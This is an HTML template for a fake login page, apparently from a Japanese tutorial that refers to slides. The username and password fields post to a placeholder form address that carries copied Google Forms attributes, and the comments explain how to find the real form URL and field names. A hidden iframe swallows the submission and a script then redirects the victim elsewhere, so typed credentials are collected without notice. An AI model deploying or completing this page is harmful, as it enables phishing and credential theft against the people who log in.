<!DOCTYPE html>
<html>
<head>
<title>ログイン</title>
</head>
<body><!--       ↓ポイント１フォームのurlは、開発者ツールから調べて　詳しくはスライドで-->
<form action="フォームのURL" method="post" target="hidden_iframe" onsubmit="submitted=true;" target="_self" method="POST" id="mG61Hd" jsmodel="TOfxwf Q91hve" data-shuffle-seed="2868127642733565241" data-response="%.@.[]]" data-first-entry="0" data-last-entry="4" data-is-first-page="true">
        <label for="username">ユーザーネーム:</label>
        <input type="text" name="ポイント2" id="username"> <!-- ラベルとIDを追加 -->
        <label for="password">パスワード:</label>
        <input type="password" name="ポイント3" id="password"> <!-- ラベルとIDを追加 -->
        <button type="submit" value="Submit">送信</button>
    </form>
    <script type="text/javascript">var submitted = false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;" onload="if(submitted){window.location='送信後に飛ぶページ';}"></iframe>
</body>
</html>
